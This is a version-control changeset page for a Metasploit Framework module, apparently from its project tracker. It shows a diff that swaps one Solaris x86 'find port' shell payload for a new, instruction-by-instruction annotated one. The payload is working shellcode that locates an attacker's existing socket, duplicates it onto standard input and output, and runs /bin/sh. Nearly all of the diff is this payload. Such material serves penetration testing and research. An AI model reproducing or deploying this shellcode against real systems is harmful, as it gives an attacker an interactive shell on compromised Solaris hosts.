Navigation

← Previous Changeset
Next Changeset →

Changeset 4843

Timestamp:

05/02/07 22:12:49 (1 year ago)

Author:

hdm

Message:

More payloads from Ramon (fixes #98, #99, #100, #101)

Files:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_find_port.rb (modified) (3 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_find_port.rb

r4571	r4843
1		##
2	1	# $Id$
3		##
4
5		##
6		~~# This file is part of the Metasploit Framework and may be subject to~~
7		~~# redistribution and commercial restrictions. Please see the Metasploit~~
8		~~# Framework web site for more information on licensing and terms of use.~~
9		~~# http://metasploit.com/projects/Framework/~~
10		##
11
12	2
13	3	require 'msf/core'
…	…
30	20	'Version' => '$Revision$',
31	21	'Description' => 'Spawn a shell on an established connection',
32		'Author' => '~~LSD <unknown@lsd~~>',
33		'License' => ~~BSD~~_LICENSE,
	22	'Author' => 'Ramon de Carvalho Valle <ramon@risesecurity.org>',
	23	'License' => MSF_LICENSE,
34	24	'Platform' => 'solaris',
35	25	'Arch' => ARCH_X86,
…	…
40	30	'Offsets' =>
41	31	{
42		'CPORT' => [ 39, 'n' ],
	32	'CPORT' => [ 43, 'n' ],
43	33	},
44	34	'Payload' =>
45		"\x56\x5f\x83\xef\x7c\x57\x8d\x4f\x10\xb0\x91\xab\xab\x91\xab\x95" +
46		"\xb5\x54\x51\x66\xb9\x01\x01\x51\x33\xc0\xb0\x36\xff\xd6\x59\x33" +
47		"\xdb\x3b\xc3\x75\x0a\x66\xbb\x00\x00\x66\x39\x5d\x02\x74\x02\xe2" +
48		"\xe6\x6a\x09\x51\x91\xb1\x03\x49\x89\x4c\x24\x08\x41\xb0\x3e\xff" +
49		"\xd6\xe2\xf4\x33\xc0\x50\xb0\x17\xff\xd6\x68\x62\x2e\x2e\x2e\x89" +
50		"\xe7\x33\xc0\x88\x47\x03\x57\xb0\x50\xff\xd6\x57\xb0\x3d\xff\xd6" +
51		"\x47\x33\xc9\xb1\xff\x57\xb0\x0c\xff\xd6\xe2\xfa\x47\x57\xb0\x3d" +
52		"\xff\xd6\xeb\x12\x33\xd2\x58\x8d\x78\x14\x57\x50\xab\x92\xab\x88" +
53		"\x42\x08\xb0\x0b\xff\xd6\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f" +
54		"\x6b\x73\x68"
	35	"\x31\xdb" +# xorl %ebx,%ebx #
	36	"\xf7\xe3" +# mull %ebx #
	37	"\x53" +# pushl %ebx #
	38	"\x89\xe7" +# movl %esp,%edi #
	39	"\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
	40	"\x6a\x65" +# pushl $0x65 #
	41	"\x89\xe6" +# movl %esp,%esi #
	42	"\xf7\x56\x04" +# notl 0x04(%esi) #
	43	"\xf6\x16" +# notb (%esi) #
	44	"\x57" +# pushl %edi #
	45	"\xb3\x91" +# movb $0x91,%bl #
	46	"\x53" +# pushl %ebx #
	47	"\x53" +# pushl %ebx #
	48	"\x54" +# pushl %esp #
	49	"\xb7\x54" +# movb $0x54,%bh #
	50	"\x53" +# pushl %ebx #
	51	"\x50" +# pushl %eax #
	52	"\x58" +# popl %eax #
	53	"\x40" +# incl %eax #
	54	"\x50" +# pushl %eax #
	55	"\x6a\x36" +# pushl $0x36 #
	56	"\x58" +# popl %eax #
	57	"\xff\xd6" +# call *%esi #
	58	"\x66\x81\x7f\x02\x04\xd2"+# cmpw $0xd204,0x02(%edi) #
	59	"\x75\xf0" +# jne <fndsockcode+31> #
	60	"\x58" +# popl %eax #
	61	"\x50" +# pushl %eax #
	62	"\x6a\x09" +# pushl $0x09 #
	63	"\x50" +# pushl %eax #
	64	"\x6a\x3e" +# pushl $0x3e #
	65	"\x58" +# popl %eax #
	66	"\xff\xd6" +# call *%esi #
	67	"\xff\x4f\xe0" +# decl -0x20(%edi) #
	68	"\x79\xf6" +# jns <fndsockcode+52> #
	69	"\x50" +# pushl %eax #
	70	"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
	71	"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
	72	"\x89\xe3" +# movl %esp,%ebx #
	73	"\x50" +# pushl %eax #
	74	"\x53" +# pushl %ebx #
	75	"\x89\xe1" +# movl %esp,%ecx #
	76	"\x50" +# pushl %eax #
	77	"\x51" +# pushl %ecx #
	78	"\x53" +# pushl %ebx #
	79	"\xb0\x3b" +# movb $0x3b,%al #
	80	"\xff\xd6" # call *%esi #
55	81	}
56	82	))

Navigation

Changeset 4843

Legend:

framework3/tags/framework-3.0/modules/payloads/singles/solaris/x86/shell_find_port.rb

Download in other formats: